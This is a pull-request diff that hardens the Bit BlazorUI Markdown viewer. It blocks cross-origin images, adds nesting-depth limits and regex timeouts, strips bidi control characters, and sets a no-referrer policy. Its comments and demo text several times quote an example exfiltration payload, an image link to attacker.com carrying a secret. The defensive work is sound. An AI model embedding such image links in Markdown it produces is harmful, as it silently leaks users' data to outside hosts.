### PR TITLE
Add missing sanitizations to BitMarkdownViewer (#12551)

### DIFF
--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
@@ -32,6 +32,10 @@ public partial class BitMarkdownViewer : BitComponentBase
 
 
 
+    [Inject] private NavigationManager _navigationManager { get; set; } = default!;
+
+
+
     /// <summary>
     /// The Markdown string value to render as html elements.
     /// </summary>
@@ -46,13 +50,14 @@ public partial class BitMarkdownViewer : BitComponentBase
     /// <summary>
     /// Controls whether remote images are allowed to load, guarding against silent
     /// data-exfiltration via auto-fetched image URLs (for example
-    /// <c>![x](https://attacker.com/leak?data=SECRET)</c>). Defaults to
-    /// <see cref="BitMarkdownViewerImageRendering.All"/> to preserve existing behavior;
-    /// set it to <see cref="BitMarkdownViewerImageRendering.SameOrigin"/> (or
-    /// <see cref="BitMarkdownViewerImageRendering.None"/>) when rendering untrusted or
-    /// AI-generated Markdown.
+    /// <c>![x](https://attacker.com/leak?data=SECRET)</c>). Defaults to the safe
+    /// <see cref="BitMarkdownViewerImageRendering.SameOrigin"/> policy, which blocks
+    /// cross-origin images while still loading same-origin and relative ones; set it
+    /// to <see cref="BitMarkdownViewerImageRendering.All"/> to opt back in to loading
+    /// every remote image when the Markdown source is fully trusted, or to
+    /// <see cref="BitMarkdownViewerImageRendering.None"/> for the strictest policy.
     /// </summary>
-    [Parameter] public BitMarkdownViewerImageRendering ImageRendering { get; set; }
+    [Parameter] public BitMarkdownViewerImageRendering ImageRendering { get; set; } = BitMarkdownViewerImageRendering.SameOrigin;
 
     /// <summary>
     /// The maximum block/inline nesting depth allowed while parsing. Content nested
@@ -203,15 +208,40 @@ public partial class BitMarkdownViewer : BitComponentBase
     private bool ShouldBlockImage(string url) => ImageRendering switch
     {
         BitMarkdownViewerImageRendering.None => true,
-        BitMarkdownViewerImageRendering.SameOrigin => IsRemote(url),
+        BitMarkdownViewerImageRendering.SameOrigin => IsCrossOrigin(url),
         _ => false
     };
 
-    // Remote = anything the browser would resolve to a different origin and fetch
-    // cross-site: absolute http(s) URLs and protocol-relative ("//host/...") URLs.
-    // Relative paths, anchors and same-document references stay same-origin and are kept.
-    private static bool IsRemote(string url) =>
-        url.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
-        url.StartsWith("https://", StringComparison.OrdinalIgnoreCase) ||
-        url.StartsWith("//", StringComparison.Ordinal);
+    // Cross-origin = a URL the browser would resolve to a different origin (scheme + host
+    // + port) than the current page and fetch cross-site. Relative paths, anchors and
+    // same-document references stay same-origin, and so do absolute URLs that point back
+    // at the current origin; only those are kept under the SameOrigin policy. Absolute
+    // http(s) URLs and protocol-relative ("//host/...") URLs are resolved against the
+    // page's base URI before their origins are compared, so same-origin absolute URLs are
+    // no longer blocked while genuinely cross-origin ones still are.
+    private bool IsCrossOrigin(string url)
+    {
+        if (string.IsNullOrEmpty(url))
+            return false;
+
+        var isAbsolute = url.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
+                         url.StartsWith("https://", StringComparison.OrdinalIgnoreCase);
+        var isProtocolRelative = url.StartsWith("//", StringComparison.Ordinal);
+
+        // Relative paths, fragments and same-document references never leave the origin.
+        if (isAbsolute is false && isProtocolRelative is false)
+            return false;
+
+        // Resolve the image URL against the page's base URI and compare origins.
+        if (Uri.TryCreate(_navigationManager.BaseUri, UriKind.Absolute, out var baseUri) &&
+            Uri.TryCreate(baseUri, url, out var imageUri))
+        {
+            return string.Equals(baseUri.Scheme, imageUri.Scheme, StringComparison.OrdinalIgnoreCase) is false ||
+                   string.Equals(baseUri.Host, imageUri.Host, StringComparison.OrdinalIgnoreCase) is false ||
+                   baseUri.Port != imageUri.Port;
+        }
+
+        // If the origin can't be determined, err on the side of caution and block.
+        return true;
+    }
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewer.cs
@@ -1,3 +1,5 @@
+using System.Text.RegularExpressions;
+
 namespace Bit.BlazorUI;
 
 /// <summary>
@@ -23,6 +25,10 @@ public partial class BitMarkdownViewer : BitComponentBase
     private BitMarkdownViewerDocumentNode _document = new();
     private string? _parsedSource;
     private BitMarkdownViewerPipeline? _parsedWith;
+    private BitMarkdownViewerImageRendering _parsedImageRendering;
+    private int _parsedMaxDepth;
+    private int _parsedMaxLength;
+    private bool _parsedStripBidi;
 
 
 
@@ -37,6 +43,44 @@ public partial class BitMarkdownViewer : BitComponentBase
     /// </summary>
     [Parameter] public BitMarkdownViewerPipeline? Pipeline { get; set; }
 
+    /// <summary>
+    /// Controls whether remote images are allowed to load, guarding against silent
+    /// data-exfiltration via auto-fetched image URLs (for example
+    /// <c>![x](https://attacker.com/leak?data=SECRET)</c>). Defaults to
+    /// <see cref="BitMarkdownViewerImageRendering.All"/> to preserve existing behavior;
+    /// set it to <see cref="BitMarkdownViewerImageRendering.SameOrigin"/> (or
+    /// <see cref="BitMarkdownViewerImageRendering.None"/>) when rendering untrusted or
+    /// AI-generated Markdown.
+    /// </summary>
+    [Parameter] public BitMarkdownViewerImageRendering ImageRendering { get; set; }
+
+    /// <summary>
+    /// The maximum block/inline nesting depth allowed while parsing. Content nested
+    /// deeper than this is rendered as plain text instead of being parsed further.
+    /// This is an always-on safeguard against denial-of-service via pathologically
+    /// nested input (e.g. thousands of nested blockquotes or lists) that would
+    /// otherwise overflow the stack. Defaults to 100; values &lt;= 0 fall back to the
+    /// default. Legitimate documents never approach this limit.
+    /// </summary>
+    [Parameter] public int MaxNestingDepth { get; set; } = BitMarkdownViewerParseOptions.DefaultMaxDepth;
+
+    /// <summary>
+    /// When greater than zero, the Markdown source is truncated to this many characters
+    /// before parsing. Use it to bound the work done on untrusted input. Defaults to 0
+    /// (no limit).
+    /// </summary>
+    [Parameter] public int MaxLength { get; set; }
+
+    /// <summary>
+    /// When <c>true</c>, Unicode bidirectional control characters are stripped from the
+    /// source before parsing, neutralizing "Trojan Source" (CVE-2021-42574) spoofing
+    /// where text is made to display in a different order than it is encoded. Recommended
+    /// for untrusted or AI-generated Markdown. Defaults to <c>false</c> to preserve
+    /// explicit right-to-left embedding in trusted content. Zero-width joiners used by
+    /// emoji and complex scripts are never removed.
+    /// </summary>
+    [Parameter] public bool StripBidiControlCharacters { get; set; }
+
 
 
     protected override string RootElementClass => "bit-mdv";
@@ -46,16 +90,60 @@ public partial class BitMarkdownViewer : BitComponentBase
     protected override void OnParametersSet()
     {
         var pipeline = EffectivePipeline;
+        var maxDepth = MaxNestingDepth > 0 ? MaxNestingDepth : BitMarkdownViewerParseOptions.DefaultMaxDepth;
 
-        // Re-parse only when the source or the pipeline reference changes.
-        if (_parsedSource != Markdown || ReferenceEquals(_parsedWith, pipeline) is false)
+        // Re-parse only when an input that affects the output changes.
+        if (_parsedSource != Markdown ||
+            ReferenceEquals(_parsedWith, pipeline) is false ||
+            _parsedImageRendering != ImageRendering ||
+            _parsedMaxDepth != maxDepth ||
+            _parsedMaxLength != MaxLength ||
+            _parsedStripBidi != StripBidiControlCharacters)
         {
-            _document = pipeline.Parse(Markdown);
+            _document = ParseSafely(pipeline, maxDepth);
+            ApplyImageRendering(_document.Children);
             _parsedSource = Markdown;
             _parsedWith = pipeline;
+            _parsedImageRendering = ImageRendering;
+            _parsedMaxDepth = maxDepth;
+            _parsedMaxLength = MaxLength;
+            _parsedStripBidi = StripBidiControlCharacters;
         }
 
         base.OnParametersSet();
+    }
+
+    /// <summary>
+    /// Applies the input-hardening steps (bidi stripping, length cap) and parses with the
+    /// configured depth limit, degrading gracefully to plain text if a parser regex hits
+    /// its anti-ReDoS timeout.
+    /// </summary>
+    private BitMarkdownViewerDocumentNode ParseSafely(BitMarkdownViewerPipeline pipeline, int maxDepth)
+    {
+        var source = Markdown;
+
+        if (StripBidiControlCharacters && !string.IsNullOrEmpty(source))
+            source = BitMarkdownViewerTextSanitizer.StripBidiControlCharacters(source);
+
+        if (MaxLength > 0 && source is not null && source.Length > MaxLength)
+            source = source[..MaxLength];
+
+        var options = new BitMarkdownViewerParseOptions { MaxDepth = maxDepth };
+
+        try
+        {
+            return pipeline.Parse(source, options);
+        }
+        catch (RegexMatchTimeoutException)
+        {
+            // A parser regex hit its safety timeout on hostile input. Fall back to a
+            // plain-text rendering of the source instead of surfacing the exception.
+            var fallback = new BitMarkdownViewerDocumentNode();
+            var paragraph = new BitMarkdownViewerParagraphNode();
+            paragraph.Inlines.Add(new BitMarkdownViewerTextNode(source ?? string.Empty));
+            fallback.Children.Add(paragraph);
+            return fallback;
+        }
     }
 
     protected override void BuildRenderTree(RenderTreeBuilder builder)
@@ -78,4 +166,52 @@ public partial class BitMarkdownViewer : BitComponentBase
 
         builder.CloseElement();
     }
+
+    /// <summary>
+    /// Walks the parsed AST and strips the source from any image that the active
+    /// <see cref="ImageRendering"/> policy disallows, so the browser never issues the
+    /// underlying request. The alt text is preserved for accessibility.
+    /// </summary>
+    private void ApplyImageRendering(IList<BitMarkdownViewerMarkdownNode> nodes)
+    {
+        if (ImageRendering == BitMarkdownViewerImageRendering.All)
+            return;
+
+        for (int i = 0; i < nodes.Count; i++)
+        {
+            var node = nodes[i];
+
+            if (node is BitMarkdownViewerImageNode img && ShouldBlockImage(img.Url))
+            {
+                // Url is init-only, so replace the node with a source-less copy.
+                nodes[i] = new BitMarkdownViewerImageNode
+                {
+                    Url = string.Empty,
+                    Title = img.Title,
+                    Alt = img.Alt
+                };
+                continue;
+            }
+
+            foreach (var childList in node.ChildLists)
+            {
+                ApplyImageRendering(childList);
+            }
+        }
+    }
+
+    private bool ShouldBlockImage(string url) => ImageRendering switch
+    {
+        BitMarkdownViewerImageRendering.None => true,
+        BitMarkdownViewerImageRendering.SameOrigin => IsRemote(url),
+        _ => false
+    };
+
+    // Remote = anything the browser would resolve to a different origin and fetch
+    // cross-site: absolute http(s) URLs and protocol-relative ("//host/...") URLs.
+    // Relative paths, anchors and same-document references stay same-origin and are kept.
+    private static bool IsRemote(string url) =>
+        url.StartsWith("http://", StringComparison.OrdinalIgnoreCase) ||
+        url.StartsWith("https://", StringComparison.OrdinalIgnoreCase) ||
+        url.StartsWith("//", StringComparison.Ordinal);
 }

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerImageRendering.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/BitMarkdownViewerImageRendering.cs
@@ -1,0 +1,31 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Controls how the <see cref="BitMarkdownViewer"/> handles image sources, primarily as a
+/// defense against data-exfiltration attacks. A remote image such as
+/// <c>![x](https://attacker.com/leak?data=SECRET)</c> is fetched automatically by the
+/// browser the moment it is rendered, silently leaking whatever the attacker encodes into
+/// the URL (and the page URL via the referrer header) without any user interaction.
+/// </summary>
+public enum BitMarkdownViewerImageRendering
+{
+    /// <summary>
+    /// All images are rendered and loaded automatically, including remote ones.
+    /// Suitable only when the Markdown source is fully trusted.
+    /// </summary>
+    All,
+
+    /// <summary>
+    /// Only same-origin images (relative paths, anchors and same-document references) are
+    /// loaded. Remote images (<c>http:</c>, <c>https:</c> and protocol-relative <c>//</c>)
+    /// are blocked so they cannot trigger automatic cross-origin requests. The alt text is
+    /// still rendered. This is the recommended mode for untrusted or AI-generated Markdown.
+    /// </summary>
+    SameOrigin,
+
+    /// <summary>
+    /// No image is allowed to load; every image source is stripped and only the alt text
+    /// remains. The strictest option.
+    /// </summary>
+    None
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Extensions/BitMarkdownViewerAutoLinkAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Extensions/BitMarkdownViewerAutoLinkAstProcessor.cs
@@ -14,7 +14,8 @@ public sealed partial class BitMarkdownViewerAutoLinkAstProcessor : BitMarkdownV
         @"|(?<www>www\.[^\s<]+)" +
         @"|(?<email>[A-Za-z0-9._%+\-]+@[A-Za-z0-9.\-]+\.[A-Za-z]{2,})" +
         @")",
-        RegexOptions.IgnoreCase)]
+        RegexOptions.IgnoreCase,
+        matchTimeoutMilliseconds: 1000)]
     private static partial Regex LinkPattern();
 
     public override void Process(BitMarkdownViewerDocumentNode document, BitMarkdownViewerPipeline pipeline)
@@ -55,7 +56,17 @@ public sealed partial class BitMarkdownViewerAutoLinkAstProcessor : BitMarkdownV
 
     private static List<BitMarkdownViewerMarkdownNode>? Split(string text)
     {
-        var matches = LinkPattern().Matches(text);
+        MatchCollection matches;
+        try
+        {
+            matches = LinkPattern().Matches(text);
+            _ = matches.Count; // Force evaluation so a ReDoS timeout surfaces here.
+        }
+        catch (RegexMatchTimeoutException)
+        {
+            // Pathological input: skip autolinking this run rather than hang.
+            return null;
+        }
         if (matches.Count == 0) return null;
 
         var result = new List<BitMarkdownViewerMarkdownNode>();

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerAutolinkInlineParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerAutolinkInlineParser.cs
@@ -8,7 +8,9 @@ public sealed partial class BitMarkdownViewerAutolinkInlineParser : BitMarkdownV
     // CommonMark email autolink grammar. Only a token matching this is turned into a
     // mailto link; anything else inside <...> stays plain text.
     [System.Text.RegularExpressions.GeneratedRegex(
-        @"^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$")]
+        @"^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$",
+        System.Text.RegularExpressions.RegexOptions.None,
+        matchTimeoutMilliseconds: 1000)]
     private static partial System.Text.RegularExpressions.Regex EmailAutolink();
 
     public override bool TryParse(BitMarkdownViewerInlineProcessor state)
@@ -33,7 +35,17 @@ public sealed partial class BitMarkdownViewerAutolinkInlineParser : BitMarkdownV
             }
         }
 
-        if (EmailAutolink().IsMatch(inner))
+        bool isEmail;
+        try
+        {
+            isEmail = EmailAutolink().IsMatch(inner);
+        }
+        catch (System.Text.RegularExpressions.RegexMatchTimeoutException)
+        {
+            // Pathological input: treat as a non-match rather than hang.
+            return false;
+        }
+        if (isEmail)
         {
             Emit(state, "mailto:" + inner, inner, close);
             return true;

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerBlockProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerBlockProcessor.cs
@@ -8,12 +8,25 @@ namespace Bit.BlazorUI;
 public sealed class BitMarkdownViewerBlockProcessor
 {
     internal BitMarkdownViewerBlockProcessor(BitMarkdownViewerPipeline pipeline, IReadOnlyList<string> lines)
+        : this(pipeline, lines, BitMarkdownViewerParseOptions.Default, 0)
+    {
+    }
+
+    internal BitMarkdownViewerBlockProcessor(BitMarkdownViewerPipeline pipeline, IReadOnlyList<string> lines, BitMarkdownViewerParseOptions options, int depth)
     {
         Pipeline = pipeline;
         Lines = lines;
+        Options = options;
+        Depth = depth;
     }
 
     public BitMarkdownViewerPipeline Pipeline { get; }
+
+    /// <summary>The safety limits in effect for this parse.</summary>
+    internal BitMarkdownViewerParseOptions Options { get; }
+
+    /// <summary>The current nesting depth of this processor within the document.</summary>
+    internal int Depth { get; }
 
     /// <summary>The lines being parsed in the current scope.</summary>
     public IReadOnlyList<string> Lines { get; }
@@ -43,10 +56,10 @@ public sealed class BitMarkdownViewerBlockProcessor
     }
 
     /// <summary>Recursively parses a nested set of lines (list items, block quotes).</summary>
-    public List<BitMarkdownViewerMarkdownNode> ParseBlocks(IReadOnlyList<string> lines) => Pipeline.ParseBlocks(lines);
+    public List<BitMarkdownViewerMarkdownNode> ParseBlocks(IReadOnlyList<string> lines) => Pipeline.ParseBlocks(lines, Options, Depth + 1);
 
     /// <summary>Parses inline content using the pipeline's inline parsers.</summary>
-    public List<BitMarkdownViewerMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text);
+    public List<BitMarkdownViewerMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text, Options, Depth + 1);
 
     /// <summary>True if any block parser (other than the paragraph fallback) starts at the line.</summary>
     public bool StartsBlock(int lineIndex)

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerInlineProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerInlineProcessor.cs
@@ -13,10 +13,26 @@ public sealed class BitMarkdownViewerInlineProcessor
     private readonly StringBuilder _literal = new();
     private readonly List<Tok> _tokens = new();
 
-    internal BitMarkdownViewerInlineProcessor(BitMarkdownViewerPipeline pipeline) => Pipeline = pipeline;
+    internal BitMarkdownViewerInlineProcessor(BitMarkdownViewerPipeline pipeline)
+        : this(pipeline, BitMarkdownViewerParseOptions.Default, 0)
+    {
+    }
+
+    internal BitMarkdownViewerInlineProcessor(BitMarkdownViewerPipeline pipeline, BitMarkdownViewerParseOptions options, int depth)
+    {
+        Pipeline = pipeline;
+        Options = options;
+        Depth = depth;
+    }
 
     /// <summary>The owning pipeline.</summary>
     public BitMarkdownViewerPipeline Pipeline { get; }
+
+    /// <summary>The safety limits in effect for this parse.</summary>
+    internal BitMarkdownViewerParseOptions Options { get; }
+
+    /// <summary>The current nesting depth of this processor within the document.</summary>
+    internal int Depth { get; }
 
     /// <summary>The text currently being parsed.</summary>
     public string Text { get; private set; } = string.Empty;
@@ -37,7 +53,7 @@ public sealed class BitMarkdownViewerInlineProcessor
     }
 
     /// <summary>Parses inline content in an isolated child processor (e.g. for a link label).</summary>
-    public List<BitMarkdownViewerMarkdownNode> ParseInlines(string text) => new BitMarkdownViewerInlineProcessor(Pipeline).Parse(text);
+    public List<BitMarkdownViewerMarkdownNode> ParseInlines(string text) => Pipeline.ParseInlines(text, Options, Depth + 1);
 
     // -- API used by inline parsers ----------------------------------------
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerTextSanitizer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Parsing/BitMarkdownViewerTextSanitizer.cs
@@ -1,0 +1,47 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Pre-processing helpers applied to the raw Markdown source before parsing.
+/// </summary>
+internal static class BitMarkdownViewerTextSanitizer
+{
+    /// <summary>
+    /// Removes Unicode bidirectional formatting characters that can be abused to make
+    /// the rendered text (links, code, ...) display in a different order than it is
+    /// logically encoded - the "Trojan Source" class of spoofing attacks (CVE-2021-42574).
+    /// </summary>
+    /// <remarks>
+    /// Only the bidi reordering control characters are stripped. Characters needed by
+    /// legitimate scripts and emoji - notably the zero-width joiner (U+200D) and
+    /// non-joiner (U+200C) - are deliberately preserved. Text direction for genuine
+    /// right-to-left content is still handled by the host via the <c>dir</c> attribute
+    /// and the browser's bidi algorithm, so removing the explicit overrides is safe.
+    /// </remarks>
+    public static string StripBidiControlCharacters(string text)
+    {
+        if (string.IsNullOrEmpty(text)) return text;
+
+        // Quick scan: avoid allocating when there is nothing to strip (the common case).
+        bool hasAny = false;
+        foreach (char c in text)
+        {
+            if (IsBidiControl(c)) { hasAny = true; break; }
+        }
+        if (!hasAny) return text;
+
+        var sb = new System.Text.StringBuilder(text.Length);
+        foreach (char c in text)
+        {
+            if (!IsBidiControl(c)) sb.Append(c);
+        }
+        return sb.ToString();
+    }
+
+    // The Unicode bidi formatting / override / isolate controls plus the directional
+    // marks, per UAX #9 and the Trojan Source research.
+    private static bool IsBidiControl(char c) =>
+        c is '\u202A' or '\u202B' or '\u202C' or '\u202D' or '\u202E' // LRE RLE PDF LRO RLO
+          or '\u2066' or '\u2067' or '\u2068' or '\u2069'             // LRI RLI FSI PDI
+          or '\u200E' or '\u200F'                                     // LRM RLM
+          or '\u061C';                                                // ALM (Arabic letter mark)
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Pipeline/BitMarkdownViewerParseOptions.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Pipeline/BitMarkdownViewerParseOptions.cs
@@ -1,0 +1,23 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Per-parse limits that keep parsing of untrusted Markdown bounded and safe from
+/// resource-exhaustion (DoS) attacks. These are threaded through the recursive block
+/// and inline parsers so a single hostile document cannot exhaust the stack or CPU.
+/// </summary>
+internal sealed class BitMarkdownViewerParseOptions
+{
+    /// <summary>
+    /// Maximum block/inline nesting depth. Beyond this, nested content is emitted as
+    /// plain text instead of recursing further. This prevents a (process-killing,
+    /// uncatchable) <see cref="System.StackOverflowException"/> from pathological input
+    /// such as thousands of nested blockquotes or lists.
+    /// </summary>
+    public int MaxDepth { get; init; } = DefaultMaxDepth;
+
+    /// <summary>The default nesting-depth ceiling; far deeper than any legitimate document.</summary>
+    public const int DefaultMaxDepth = 100;
+
+    /// <summary>Shared instance carrying the default limits.</summary>
+    public static readonly BitMarkdownViewerParseOptions Default = new();
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Pipeline/BitMarkdownViewerPipeline.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Pipeline/BitMarkdownViewerPipeline.cs
@@ -43,13 +43,16 @@ public sealed class BitMarkdownViewerPipeline
     internal IReadOnlySet<char> DelimiterChars { get; }
 
     /// <summary>Parses Markdown source into an AST, applying all AST processors.</summary>
-    public BitMarkdownViewerDocumentNode Parse(string? markdown)
+    public BitMarkdownViewerDocumentNode Parse(string? markdown) => Parse(markdown, BitMarkdownViewerParseOptions.Default);
+
+    /// <summary>Parses Markdown source into an AST using the supplied safety limits.</summary>
+    internal BitMarkdownViewerDocumentNode Parse(string? markdown, BitMarkdownViewerParseOptions options)
     {
         var document = new BitMarkdownViewerDocumentNode();
         if (string.IsNullOrEmpty(markdown))
             return document;
 
-        document.Children.AddRange(ParseBlocks(SplitLines(markdown)));
+        document.Children.AddRange(ParseBlocks(SplitLines(markdown), options, 0));
 
         foreach (var processor in AstProcessors)
             processor.Process(document, this);
@@ -57,11 +60,28 @@ public sealed class BitMarkdownViewerPipeline
         return document;
     }
 
-    internal List<BitMarkdownViewerMarkdownNode> ParseBlocks(IReadOnlyList<string> lines)
-        => new BitMarkdownViewerBlockProcessor(this, lines).Run();
+    internal List<BitMarkdownViewerMarkdownNode> ParseBlocks(IReadOnlyList<string> lines, BitMarkdownViewerParseOptions options, int depth)
+    {
+        // Depth guard: stop recursing into ever-deeper nested blocks and instead keep
+        // the remaining lines as a single plain-text paragraph. This caps recursion so
+        // hostile input (e.g. ">>>>...") cannot trigger a StackOverflowException.
+        if (depth > options.MaxDepth)
+        {
+            var para = new BitMarkdownViewerParagraphNode();
+            para.Inlines.Add(new BitMarkdownViewerTextNode(string.Join("\n", lines)));
+            return new List<BitMarkdownViewerMarkdownNode> { para };
+        }
 
-    internal List<BitMarkdownViewerMarkdownNode> ParseInlines(string text)
-        => new BitMarkdownViewerInlineProcessor(this).Parse(text);
+        return new BitMarkdownViewerBlockProcessor(this, lines, options, depth).Run();
+    }
+
+    internal List<BitMarkdownViewerMarkdownNode> ParseInlines(string text, BitMarkdownViewerParseOptions options, int depth)
+    {
+        if (depth > options.MaxDepth)
+            return new List<BitMarkdownViewerMarkdownNode> { new BitMarkdownViewerTextNode(text) };
+
+        return new BitMarkdownViewerInlineProcessor(this, options, depth).Parse(text);
+    }
 
     /// <summary>Creates a renderer bound to this pipeline's node renderers.</summary>
     public BitMarkdownViewerMarkdownRenderer CreateRenderer() => new(Renderers);

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Rendering/BitMarkdownViewerCoreRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Components/MarkdownViewer/Rendering/BitMarkdownViewerCoreRenderer.cs
@@ -105,6 +105,8 @@ public sealed class BitMarkdownViewerCoreRenderer : BitMarkdownViewerNodeRendere
                 b.AddAttribute(21, "alt", img.Alt);
                 if (!string.IsNullOrEmpty(img.Title))
                     b.AddAttribute(22, "title", img.Title);
+                // Never leak the (possibly token-bearing) page URL to the image host.
+                b.AddAttribute(28, "referrerpolicy", "no-referrer");
                 b.CloseElement();
                 break;
 

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
@@ -52,7 +52,11 @@
                 <div class="mdv-split">
                     <textarea class="mdv-editor" spellcheck="false" aria-label="Markdown editor" @bind="playgroundMarkdown" @bind:event="oninput"></textarea>
                     <div class="mdv-preview">
-                        <BitMarkdownViewer Markdown="@playgroundMarkdown" Pipeline="@playgroundPipeline" />
+                        <BitMarkdownViewer Markdown="@playgroundMarkdown"
+                                           Pipeline="@playgroundPipeline"
+                                           ImageRendering="BitMarkdownViewerImageRendering.SameOrigin"
+                                           StripBidiControlCharacters="true"
+                                           MaxLength="100000" />
                     </div>
                 </div>
             </div>

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor
@@ -9,6 +9,7 @@
           SecondaryNames="@(["MdViewer", "MD"])"
           Parameters="componentParameters"
           SubClasses="componentSubClasses"
+          SubEnums="componentSubEnums"
           GitHubExtrasUrl="MarkdownViewer/BitMarkdownViewer.cs"
           GitHubDemoUrl="Extras/MarkdownViewer/BitMarkdownViewerDemo.razor">
     <NotesTemplate>

--- a/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
+++ b/src/BlazorUI/Demo/Client/Bit.BlazorUI.Demo.Client.Core/Pages/Components/Extras/MarkdownViewer/BitMarkdownViewerDemo.razor.cs
@@ -24,6 +24,45 @@ public partial class BitMarkdownViewerDemo
            LinkType = LinkType.Link,
            Href = "#markdown-viewer-pipeline",
         },
+        new()
+        {
+           Name = "ImageRendering",
+           Type = "BitMarkdownViewerImageRendering",
+           DefaultValue = "BitMarkdownViewerImageRendering.All",
+           Description = @"Controls whether remote images are allowed to load, guarding against silent data-exfiltration
+                           via auto-fetched image URLs (for example ![x](https://attacker.com/leak?data=SECRET)).
+                           Set it to SameOrigin or None when rendering untrusted or AI-generated Markdown.",
+           LinkType = LinkType.Link,
+           Href = "#markdown-viewer-image-rendering-enum",
+        },
+        new()
+        {
+           Name = "MaxNestingDepth",
+           Type = "int",
+           DefaultValue = "100",
+           Description = @"The maximum block/inline nesting depth allowed while parsing. Content nested deeper than this is rendered
+                           as plain text instead of being parsed further. An always-on safeguard against denial-of-service via
+                           pathologically nested input (e.g. thousands of nested blockquotes) that would otherwise overflow the
+                           stack. Values <= 0 fall back to the default. Legitimate documents never approach this limit.",
+        },
+        new()
+        {
+           Name = "MaxLength",
+           Type = "int",
+           DefaultValue = "0",
+           Description = @"When greater than zero, the Markdown source is truncated to this many characters before parsing,
+                           bounding the work done on untrusted input. Defaults to 0 (no limit).",
+        },
+        new()
+        {
+           Name = "StripBidiControlCharacters",
+           Type = "bool",
+           DefaultValue = "false",
+           Description = @"When true, Unicode bidirectional control characters are stripped from the source before parsing,
+                           neutralizing 'Trojan Source' (CVE-2021-42574) spoofing where text is made to display in a different
+                           order than it is encoded. Recommended for untrusted or AI-generated Markdown. Zero-width joiners used
+                           by emoji and complex scripts are never removed.",
+        },
     ];
 
     private readonly List<ComponentSubClass> componentSubClasses =
@@ -132,6 +171,37 @@ public partial class BitMarkdownViewerDemo
                     Type = "void WriteNode(RenderTreeBuilder builder, BitMarkdownViewerMarkdownNode node)",
                     DefaultValue = "",
                     Description = "Renders a single node using the matching renderer (last registered wins).",
+                },
+            ]
+        },
+    ];
+
+    private readonly List<ComponentSubEnum> componentSubEnums =
+    [
+        new()
+        {
+            Id = "markdown-viewer-image-rendering-enum",
+            Name = "BitMarkdownViewerImageRendering",
+            Description = "Controls how the BitMarkdownViewer handles image sources, primarily as a defense against data-exfiltration attacks. A remote image is fetched automatically by the browser the moment it is rendered, silently leaking whatever an attacker encodes into the URL.",
+            Items =
+            [
+                new()
+                {
+                    Name = "All",
+                    Description = "All images are rendered and loaded automatically, including remote ones. Suitable only when the Markdown source is fully trusted.",
+                    Value = "0",
+                },
+                new()
+                {
+                    Name = "SameOrigin",
+                    Description = "Only same-origin images (relative paths, anchors and same-document references) are loaded. Remote images (http:, https: and protocol-relative //) are blocked. The recommended mode for untrusted or AI-generated Markdown.",
+                    Value = "1",
+                },
+                new()
+                {
+                    Name = "None",
+                    Description = "No image is allowed to load; every image source is stripped and only the alt text remains. The strictest option.",
+                    Value = "2",
